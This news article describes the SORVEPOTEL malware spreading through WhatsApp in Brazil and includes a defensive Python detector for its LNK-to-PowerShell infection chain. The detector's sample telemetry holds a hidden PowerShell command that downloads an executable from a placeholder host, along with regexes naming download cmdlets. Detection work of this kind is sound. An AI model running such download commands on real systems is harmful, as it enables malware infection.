Researchers Alert on SORVEPOTEL, a Self-Spreading Malware Targeting WhatsApp Users

A newly discovered malware campaign is targeting WhatsApp users in Brazil, spreading rapidly through phishing techniques. The malware, named SORVEPOTEL by Trend Micro researchers, is designed for fast propagation rather than data theft or ransomware.

The attack begins when compromised WhatsApp accounts send phishing messages carrying malicious ZIP attachments. The archives are often named to look like receipts or health-related documents, giving them an air of legitimacy. Each ZIP contains a Windows shortcut (LNK) file; when a victim opens it on a desktop system, the shortcut silently runs a PowerShell script that downloads the main payload from an external domain such as sorvetenopoate[.]com.

Once downloaded, the payload installs itself in the Windows Startup folder to ensure persistence and connects to a command-and-control (C2) server for further instructions.

What makes SORVEPOTEL particularly dangerous is its WhatsApp Web propagation mechanism. If it detects that WhatsApp Web is active, the malware automatically sends the malicious ZIP file to all of the victim’s contacts and groups. This leads to rapid spread across enterprise and consumer environments. Infected accounts are often banned for generating excessive spam.
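The infection chain described above (ZIP carrying an LNK, a PowerShell downloader, persistence via the Startup folder) gives a defender several checkpoints. The following is an added example, not code from Trend Micro or the article; the ZIP contents, endpoint events and the `c2.example.invalid` host are constructed placeholders, and the field names are a simplified, Sysmon-style layout assumed for illustration.

```python
import io
import re
import zipfile

# Constructed sample: a ZIP posing as a receipt that carries a Windows shortcut.
def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("comprovante.pdf.lnk", b"L\x00\x00\x00 constructed placeholder, not a real LNK")
    return buf.getvalue()

def lnk_entries_in_zip(data: bytes) -> list[str]:
    """Names of shortcut (.lnk) members inside a ZIP attachment, matched case-insensitively."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(".lnk")]

# PowerShell download primitives, non-interactive flags, and the per-user Startup folder.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass", re.I)
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.I)

def triage_event(ev: dict) -> list[str]:
    """Reasons an endpoint event matches the chain; an empty list means no match."""
    reasons = []
    if ev["type"] == "process" and ev["image"].lower().endswith("powershell.exe"):
        cmd = ev["command_line"]
        if DOWNLOAD_RE.search(cmd):
            reasons.append("powershell download cmdlet")
        if HIDDEN_RE.search(cmd):
            reasons.append("hidden/non-interactive powershell flags")
        if reasons and ev["parent_image"].lower().endswith("explorer.exe"):
            reasons.append("spawned by explorer (consistent with a double-clicked LNK)")
    elif ev["type"] == "file" and STARTUP_RE.search(ev["target"]):
        reasons.append("write into Startup folder")
    return reasons

# Constructed endpoint telemetry (simplified Sysmon-style fields).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -w hidden -nop -c "iwr http://c2.example.invalid/p.exe -OutFile $env:TEMP\p.exe"'},
    {"type": "file", "image": r"C:\Users\u\AppData\Local\Temp\p.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe receipt.txt"},
]

def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that matched at least one indicator."""
    return [(i, r) for i, ev in enumerate(events) if (r := triage_event(ev))]

if __name__ == "__main__":
    print(lnk_entries_in_zip(build_sample_zip()))
    for i, r in triage(SAMPLE_EVENTS):
        print(i, "; ".join(r))
```

Mail-gateway filtering of ZIPs that contain `.lnk` members, plus an endpoint rule on the PowerShell and Startup-folder indicators, cover the two points in the chain where the page says the malware gains execution and persistence.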

So far, researchers have identified 477 infections, with 457 cases concentrated in Brazil. The malware has heavily affected sectors including government, education, technology, manufacturing, construction, and public services.

Although there is no evidence that SORVEPOTEL steals sensitive data or encrypts files, its ability to spread quickly highlights the growing trend of cybercriminals exploiting trusted platforms like WhatsApp for large-scale attacks.